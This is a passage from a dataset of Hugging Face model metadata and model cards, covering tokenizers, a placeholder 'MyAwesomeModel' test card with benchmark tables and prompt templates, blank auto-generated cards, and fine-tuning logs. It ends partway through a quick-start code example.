Dataset columns:

| Column | Type | Values |
|---|---|---|
| modelId | string | lengths 5 to 139 |
| author | string | lengths 2 to 42 |
| last_modified | timestamp[us, tz=UTC] | 2020-02-15 11:33:14 to 2025-09-23 18:28:48 |
| downloads | int64 | 0 to 223M |
| likes | int64 | 0 to 11.7k |
| library_name | string | 573 classes |
| tags | list | lengths 1 to 4.05k |
| pipeline_tag | string | 55 classes |
| createdAt | timestamp[us, tz=UTC] | 2022-03-02 23:29:04 to 2025-09-23 18:28:01 |
| card | string | lengths 11 to 1.01M |
Sai5480/monolingual-tokenizer-native-snd-vocab-128000
|
Sai5480
| 2025-09-23T15:42:18Z | 0 | 0 | null |
[
"sentencepiece",
"tokenizer",
"monolingual",
"snd",
"vocab-128000",
"license:mit",
"region:us"
] | null | 2025-09-23T15:42:06Z |
---
license: mit
tags:
- tokenizer
- sentencepiece
- monolingual
- snd
- vocab-128000
---
# Monolingual Tokenizer - Sindhi (Vocab 128000)
This is a monolingual SentencePiece tokenizer trained on Sindhi text with a vocabulary size of 128,000.
## Usage
```python
from transformers import AutoTokenizer
# The full repo id includes the author namespace
tokenizer = AutoTokenizer.from_pretrained("Sai5480/monolingual-tokenizer-native-snd-vocab-128000")
```
## Files
- `snd.model`: SentencePiece model file
- `snd.vocab`: Vocabulary file
- `config.json`: Tokenizer configuration
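Because the repository ships a raw SentencePiece model, it can also be loaded directly with the `sentencepiece` library. A minimal sketch, assuming `snd.model` has been downloaded locally (the sample text is a placeholder):

```python
import sentencepiece as spm

# Load the raw SentencePiece model shipped in this repo
# (assumes snd.model was downloaded locally, e.g. with huggingface_hub).
sp = spm.SentencePieceProcessor(model_file="snd.model")

text = "sample Sindhi text"             # placeholder input
pieces = sp.encode(text, out_type=str)  # subword pieces
ids = sp.encode(text, out_type=int)     # token ids
print(pieces)
print(sp.decode(ids))                   # round-trip back to text
```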
## Training Details
- Language: Sindhi (snd)
- Vocabulary Size: 128000
- Model Type: SentencePiece Unigram
|
mcptester0606/MyAwesomeModel-TestRepo
|
mcptester0606
| 2025-09-23T15:40:28Z | 0 | 0 |
transformers
|
[
"transformers",
"pytorch",
"bert",
"feature-extraction",
"license:mit",
"endpoints_compatible",
"region:us"
] |
feature-extraction
| 2025-09-23T15:40:53Z |
---
license: mit
library_name: transformers
---
# MyAwesomeModel
<!-- markdownlint-disable first-line-h1 -->
<!-- markdownlint-disable html -->
<!-- markdownlint-disable no-duplicate-header -->
<div align="center">
<img src="figures/fig1.png" width="60%" alt="MyAwesomeModel" />
</div>
<hr>
<div align="center" style="line-height: 1;">
<a href="LICENSE" style="margin: 2px;">
<img alt="License" src="figures/fig2.png" style="display: inline-block; vertical-align: middle;"/>
</a>
</div>
## 1. Introduction
MyAwesomeModel has undergone a major version upgrade. In the latest update, it has substantially improved its depth of reasoning and inference by leveraging increased computational resources and introducing algorithmic optimization mechanisms during post-training. The model demonstrates outstanding performance across various benchmark evaluations, including mathematics, programming, and general logic, and its overall performance now approaches that of other leading models.
<p align="center">
<img width="80%" src="figures/fig3.png">
</p>
Compared to the previous version, the upgraded model shows significant improvements in handling complex reasoning tasks. For instance, in the AIME 2025 test, the model’s accuracy has increased from 70% in the previous version to 87.5% in the current version. This advancement stems from enhanced thinking depth during the reasoning process: in the AIME test set, the previous model used an average of 12K tokens per question, whereas the new version averages 23K tokens per question.
Beyond its improved reasoning capabilities, this version also offers a reduced hallucination rate and enhanced support for function calling.
## 2. Evaluation Results
### Comprehensive Benchmark Results
<div align="center">
| | Benchmark | Model1 | Model2 | Model1-v2 | MyAwesomeModel |
|---|---|---|---|---|---|
| **Core Reasoning Tasks** | Math Reasoning | 0.510 | 0.535 | 0.521 | 0.550 |
| | Logical Reasoning | 0.789 | 0.801 | 0.810 | 0.819 |
| | Common Sense | 0.716 | 0.702 | 0.725 | 0.736 |
| **Language Understanding** | Reading Comprehension | 0.671 | 0.685 | 0.690 | 0.700 |
| | Question Answering | 0.582 | 0.599 | 0.601 | 0.607 |
| | Text Classification | 0.803 | 0.811 | 0.820 | 0.828 |
| | Sentiment Analysis | 0.777 | 0.781 | 0.790 | 0.792 |
| **Generation Tasks** | Code Generation | 0.615 | 0.631 | 0.640 | 0.650 |
| | Creative Writing | 0.588 | 0.579 | 0.601 | 0.610 |
| | Dialogue Generation | 0.621 | 0.635 | 0.639 | 0.644 |
| | Summarization | 0.745 | 0.755 | 0.760 | 0.767 |
| **Specialized Capabilities**| Translation | 0.782 | 0.799 | 0.801 | 0.804 |
| | Knowledge Retrieval | 0.651 | 0.668 | 0.670 | 0.676 |
| | Instruction Following | 0.733 | 0.749 | 0.751 | 0.758 |
| | Safety Evaluation | 0.718 | 0.701 | 0.725 | 0.739 |
</div>
### Overall Performance Summary
The MyAwesomeModel demonstrates strong performance across all evaluated benchmark categories, with particularly notable results in reasoning and generation tasks.
## 3. Chat Website & API Platform
We offer a chat interface and API for you to interact with MyAwesomeModel. Please check our official website for more details.
## 4. How to Run Locally
Please refer to our code repository for more information about running MyAwesomeModel locally.
Compared to previous versions, the usage recommendations for MyAwesomeModel have the following changes:
1. System prompt is supported.
2. It is not required to add special tokens at the beginning of the output to force the model into a specific thinking pattern.
MyAwesomeModel-Small keeps the architecture of its base model but uses the same tokenizer configuration as the main MyAwesomeModel; it can be run in the same manner as its base model.
### System Prompt
We recommend using the following system prompt with a specific date.
```
You are MyAwesomeModel, a helpful AI assistant.
Today is {current date}.
```
For example,
```
You are MyAwesomeModel, a helpful AI assistant.
Today is May 28, 2025, Monday.
```
### Temperature
We recommend setting the temperature parameter $T_{model}$ to 0.6.
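For example, with a `transformers` text-generation pipeline this corresponds to sampling with `temperature=0.6`. A minimal sketch, where the model id is a placeholder:

```python
from transformers import pipeline

# "my-awesome-model" is a placeholder id; substitute the real checkpoint.
generator = pipeline("text-generation", model="my-awesome-model")
out = generator(
    "Hello!",
    do_sample=True,    # sampling must be enabled for temperature to apply
    temperature=0.6,   # recommended setting from this card
    max_new_tokens=64,
)
print(out[0]["generated_text"])
```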
### Prompts for File Uploading and Web Search
For file uploading, please follow the template to create prompts, where {file_name}, {file_content} and {question} are arguments.
```
file_template = \
"""[file name]: {file_name}
[file content begin]
{file_content}
[file content end]
{question}"""
```
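As a rough illustration, the template can be filled with Python's `str.format`; the file name, content, and question below are placeholder values:

```python
file_template = """[file name]: {file_name}
[file content begin]
{file_content}
[file content end]
{question}"""

# Placeholder arguments for illustration.
prompt = file_template.format(
    file_name="report.txt",
    file_content="Q3 revenue grew 12% year over year.",
    question="Summarize the key figure in one sentence.",
)
print(prompt)
```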
For web search enhanced generation, we recommend the following prompt template where {search_results}, {cur_date}, and {question} are arguments.
```
search_answer_en_template = \
'''# The following contents are the search results related to the user's message:
{search_results}
In the search results I provide to you, each result is formatted as [webpage X begin]...[webpage X end], where X represents the numerical index of each article. Please cite the context at the end of the relevant sentence when appropriate. Use the citation format [citation:X] in the corresponding part of your answer. If a sentence is derived from multiple contexts, list all relevant citation numbers, such as [citation:3][citation:5]. Be sure not to cluster all citations at the end; instead, include them in the corresponding parts of the answer.
When responding, please keep the following points in mind:
- Today is {cur_date}.
- Not all content in the search results is closely related to the user's question. You need to evaluate and filter the search results based on the question.
- For listing-type questions (e.g., listing all flight information), try to limit the answer to 10 key points and inform the user that they can refer to the search sources for complete information. Prioritize providing the most complete and relevant items in the list. Avoid mentioning content not provided in the search results unless necessary.
- For creative tasks (e.g., writing an essay), ensure that references are cited within the body of the text, such as [citation:3][citation:5], rather than only at the end of the text. You need to interpret and summarize the user's requirements, choose an appropriate format, fully utilize the search results, extract key information, and generate an answer that is insightful, creative, and professional. Extend the length of your response as much as possible, addressing each point in detail and from multiple perspectives, ensuring the content is rich and thorough.
- If the response is lengthy, structure it well and summarize it in paragraphs. If a point-by-point format is needed, try to limit it to 5 points and merge related content.
- For objective Q&A, if the answer is very brief, you may add one or two related sentences to enrich the content.
- Choose an appropriate and visually appealing format for your response based on the user's requirements and the content of the answer, ensuring strong readability.
- Your answer should synthesize information from multiple relevant webpages and avoid repeatedly citing the same webpage.
- Unless the user requests otherwise, your response should be in the same language as the user's question.
# The user's message is:
{question}'''
```
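The search template is filled the same way; a minimal sketch with placeholder search results, formatting `{cur_date}` in the same style as the system prompt date:

```python
from datetime import date

# Continues from search_answer_en_template as defined above.
search_results = "[webpage 1 begin]Example article text.[webpage 1 end]"  # placeholder

prompt = search_answer_en_template.format(
    search_results=search_results,
    cur_date=date.today().strftime("%B %d, %Y, %A"),  # e.g. "May 28, 2025, Wednesday"
    question="What does the article say?",            # placeholder question
)
```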
## 5. License
This code repository is licensed under the [MIT License](LICENSE). The use of MyAwesomeModel models is also subject to the [MIT License](LICENSE). The model series supports commercial use and distillation.
## 6. Contact
If you have any questions, please raise an issue on our GitHub repository or contact us at [email protected].
|
ZaneHorrible/hs_adib_banglabert
|
ZaneHorrible
| 2025-09-23T15:40:05Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"electra",
"text-classification",
"arxiv:1910.09700",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
text-classification
| 2025-09-23T15:36:37Z |
---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
Alee43/blockassist
|
Alee43
| 2025-09-23T15:39:53Z | 0 | 0 | null |
[
"gensyn",
"blockassist",
"gensyn-blockassist",
"minecraft",
"sly eager boar",
"arxiv:2504.07091",
"region:us"
] | null | 2025-09-11T18:43:49Z |
---
tags:
- gensyn
- blockassist
- gensyn-blockassist
- minecraft
- sly eager boar
---
# Gensyn BlockAssist
Gensyn's BlockAssist is a distributed extension of the paper [AssistanceZero: Scalably Solving Assistance Games](https://arxiv.org/abs/2504.07091).
|
Sai5480/monolingual-tokenizer-native-asm-vocab-128000
|
Sai5480
| 2025-09-23T15:39:36Z | 0 | 0 | null |
[
"sentencepiece",
"tokenizer",
"monolingual",
"asm",
"vocab-128000",
"license:mit",
"region:us"
] | null | 2025-09-23T15:39:23Z |
---
license: mit
tags:
- tokenizer
- sentencepiece
- monolingual
- asm
- vocab-128000
---
# Monolingual Tokenizer - Assamese (Vocab 128000)
This is a monolingual SentencePiece tokenizer trained on Assamese text with a vocabulary size of 128,000.
## Usage
```python
from transformers import AutoTokenizer
# The full repo id includes the author namespace
tokenizer = AutoTokenizer.from_pretrained("Sai5480/monolingual-tokenizer-native-asm-vocab-128000")
```
## Files
- `asm.model`: SentencePiece model file
- `asm.vocab`: Vocabulary file
- `config.json`: Tokenizer configuration
## Training Details
- Language: Assamese (asm)
- Vocabulary Size: 128000
- Model Type: SentencePiece Unigram
|
Best000/eg_a36
|
Best000
| 2025-09-23T15:39:30Z | 0 | 0 | null |
[
"safetensors",
"any-to-any",
"omega",
"omegalabs",
"bittensor",
"agi",
"license:mit",
"region:us"
] |
any-to-any
| 2025-09-23T15:37:06Z |
---
license: mit
tags:
- any-to-any
- omega
- omegalabs
- bittensor
- agi
---
This is an Any-to-Any model checkpoint for the OMEGA Labs x Bittensor Any-to-Any subnet.
Check out the [git repo](https://github.com/omegalabsinc/omegalabs-anytoany-bittensor) and find OMEGA on X: [@omegalabsai](https://x.com/omegalabsai).
|
aamijar/Llama-2-13b-hf-lora-r8-boolq-epochs3
|
aamijar
| 2025-09-23T15:37:42Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T15:37:39Z |
---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
thefirstgoku/23SEP_inter_v32_4
|
thefirstgoku
| 2025-09-23T15:35:16Z | 0 | 0 | null |
[
"safetensors",
"any-to-any",
"omega",
"omegalabs",
"bittensor",
"agi",
"license:mit",
"region:us"
] |
any-to-any
| 2025-09-23T15:34:37Z |
---
license: mit
tags:
- any-to-any
- omega
- omegalabs
- bittensor
- agi
---
This is an Any-to-Any model checkpoint for the OMEGA Labs x Bittensor Any-to-Any subnet.
Check out the [git repo](https://github.com/omegalabsinc/omegalabs-anytoany-bittensor) and find OMEGA on X: [@omegalabsai](https://x.com/omegalabsai).
|
ziadrone/training_output
|
ziadrone
| 2025-09-23T15:35:12Z | 0 | 0 |
transformers
|
[
"transformers",
"tensorboard",
"safetensors",
"llama",
"text-generation",
"generated_from_trainer",
"base_model:shivash/enhanced-hybrid-transformer-768d",
"base_model:finetune:shivash/enhanced-hybrid-transformer-768d",
"license:apache-2.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-23T15:34:46Z |
---
library_name: transformers
license: apache-2.0
base_model: shivash/enhanced-hybrid-transformer-768d
tags:
- generated_from_trainer
model-index:
- name: training_output
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# training_output
This model is a fine-tuned version of [shivash/enhanced-hybrid-transformer-768d](https://huggingface.co/shivash/enhanced-hybrid-transformer-768d) on an unknown dataset.
It achieves the following results on the evaluation set:
- Loss: 5.8198
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 4
- eval_batch_size: 4
- seed: 42
- gradient_accumulation_steps: 8
- total_train_batch_size: 32
- optimizer: AdamW (torch, fused) with betas=(0.9, 0.999) and epsilon=1e-08; no additional optimizer arguments
- lr_scheduler_type: cosine
- lr_scheduler_warmup_ratio: 0.1
- num_epochs: 3
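For reference, these settings map onto 🤗 `TrainingArguments` roughly as follows (a sketch; `output_dir` is a placeholder):

```python
from transformers import TrainingArguments

args = TrainingArguments(
    output_dir="training_output",      # placeholder
    learning_rate=5e-05,
    per_device_train_batch_size=4,
    per_device_eval_batch_size=4,
    seed=42,
    gradient_accumulation_steps=8,     # 4 x 8 = 32 effective batch size
    optim="adamw_torch_fused",
    lr_scheduler_type="cosine",
    warmup_ratio=0.1,
    num_train_epochs=3,
)
```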
### Training results
| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:------:|:----:|:---------------:|
| 7.0101 | 0.3366 | 250 | 6.9214 |
| 6.4366 | 0.6732 | 500 | 6.4452 |
| 6.1029 | 1.0094 | 750 | 6.1787 |
| 5.8866 | 1.3460 | 1000 | 6.0269 |
| 5.7574 | 1.6826 | 1250 | 5.9218 |
| 5.6024 | 2.0188 | 1500 | 5.8609 |
| 5.4617 | 2.3554 | 1750 | 5.8362 |
| 5.4463 | 2.6920 | 2000 | 5.8198 |
### Framework versions
- Transformers 4.56.1
- Pytorch 2.8.0+cu126
- Datasets 4.0.0
- Tokenizers 0.22.0
|
Kuongan/Hal_phobert-large_finetuned
|
Kuongan
| 2025-09-23T15:31:35Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"roberta",
"text-classification",
"generated_from_trainer",
"base_model:vinai/phobert-large",
"base_model:finetune:vinai/phobert-large",
"license:mit",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
text-classification
| 2025-09-23T14:19:48Z |
---
library_name: transformers
license: mit
base_model: vinai/phobert-large
tags:
- generated_from_trainer
metrics:
- accuracy
model-index:
- name: Hal_phobert-large_finetuned
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# Hal_phobert-large_finetuned
This model is a fine-tuned version of [vinai/phobert-large](https://huggingface.co/vinai/phobert-large) on the None dataset.
It achieves the following results on the evaluation set:
- Loss: 0.7847
- Accuracy: 0.7407
- F1 Macro: 0.7417
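A minimal inference sketch (assuming the checkpoint loads with the standard text-classification pipeline; the input sentence is a placeholder):

```python
from transformers import pipeline

clf = pipeline("text-classification", model="Kuongan/Hal_phobert-large_finetuned")
print(clf("Ví dụ một câu tiếng Việt."))  # placeholder Vietnamese input
```

Note that PhoBERT models generally expect word-segmented Vietnamese input, so raw text may give weaker predictions.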
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 2e-05
- train_batch_size: 64
- eval_batch_size: 64
- seed: 42
- optimizer: AdamW (torch) with betas=(0.9, 0.999) and epsilon=1e-08; no additional optimizer arguments
- lr_scheduler_type: linear
- num_epochs: 20
- mixed_precision_training: Native AMP
### Training results
| Training Loss | Epoch | Step | Validation Loss | Accuracy | F1 Macro |
|:-------------:|:-----:|:----:|:---------------:|:--------:|:--------:|
| 1.0956 | 1.0 | 88 | 0.7993 | 0.6786 | 0.6786 |
| 0.7654 | 2.0 | 176 | 0.7491 | 0.71 | 0.7089 |
| 0.618 | 3.0 | 264 | 0.7432 | 0.7257 | 0.7287 |
| 0.4807 | 4.0 | 352 | 0.7847 | 0.7407 | 0.7417 |
| 0.3665 | 5.0 | 440 | 0.8301 | 0.7357 | 0.7376 |
| 0.2522 | 6.0 | 528 | 0.8437 | 0.735 | 0.7364 |
| 0.2095 | 7.0 | 616 | 0.9808 | 0.7357 | 0.7362 |
### Framework versions
- Transformers 4.52.4
- Pytorch 2.6.0+cu124
- Datasets 3.6.0
- Tokenizers 0.21.2
|
Ayesha490/mistral-7b-qlora-merged-qa
|
Ayesha490
| 2025-09-23T15:31:14Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T15:31:04Z |
---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT-PKU-SafeRLHF-OMWU-1.0-mnt64-0922195515-epoch-8
|
vectorzhou
| 2025-09-23T15:30:07Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"gemma2",
"text-generation",
"generated_from_trainer",
"fine-tuned",
"trl",
"extra-gradient",
"conversational",
"dataset:PKU-Alignment/PKU-SafeRLHF",
"arxiv:2503.08942",
"base_model:vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT",
"base_model:finetune:vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-23T14:16:27Z |
---
base_model: vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT
datasets: PKU-Alignment/PKU-SafeRLHF
library_name: transformers
model_name: gemma-2-2b-it-alpaca-cleaned-SFT-PKU-SafeRLHF-OMWU-1.0-mnt64
tags:
- generated_from_trainer
- text-generation
- fine-tuned
- trl
- extra-gradient
licence: license
---
# Model Card for gemma-2-2b-it-alpaca-cleaned-SFT-PKU-SafeRLHF-OMWU-1.0-mnt64
This model is a fine-tuned version of [vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT](https://huggingface.co/vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT) on the [PKU-Alignment/PKU-SafeRLHF](https://huggingface.co/datasets/PKU-Alignment/PKU-SafeRLHF) dataset.
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
